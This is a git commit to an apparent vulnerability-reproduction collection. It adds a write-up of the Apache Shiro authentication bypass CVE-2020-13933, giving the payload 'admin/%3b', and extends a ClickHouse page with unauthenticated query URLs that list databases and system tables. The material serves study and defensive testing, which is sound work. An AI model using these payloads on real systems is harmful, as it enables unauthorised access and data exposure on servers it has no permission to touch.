更新README.md

This commit is contained in:
Threekiii 2023-07-25 17:16:05 +08:00
parent b9388f7b51
commit c6248232c2
6 changed files with 40 additions and 3 deletions

View File

@ -438,6 +438,7 @@
* Apache OF Biz RMI Bypass RCE CVE 2021 29200
* Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
* Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437
* Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
* Apache Solr JMX服务 RCE CVE-2019-12409

View File

@ -0,0 +1,25 @@
# Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
## 漏洞描述
2020年8月18日Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞CVE-2020-13933经过分析攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。
## 漏洞影响
```
Apache Shiro < 1.6.0
```
## 漏洞复现
正常访问 /admin需要登录
![image-20230724162154509](images/image-20230724162154509.png)
构造恶意请求绕过:
```
admin/%3b
```
![image-20230724162320484](images/image-20230724162320484.png)

Binary file not shown.

After

Width:  |  Height:  |  Size: 148 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 94 KiB

View File

@ -26,8 +26,19 @@ ClickHouse
![img](./images/202202091258245.png)
```php
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
```
![img](images/202202091258274-16898396122771.png)
其他的SQL语句
```
http://your-ip:8123/?query=SHOW%20DATABASES
```
```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables
```
![img](./images/202202091258274.png)

Binary file not shown.

After

Width:  |  Height:  |  Size: 534 KiB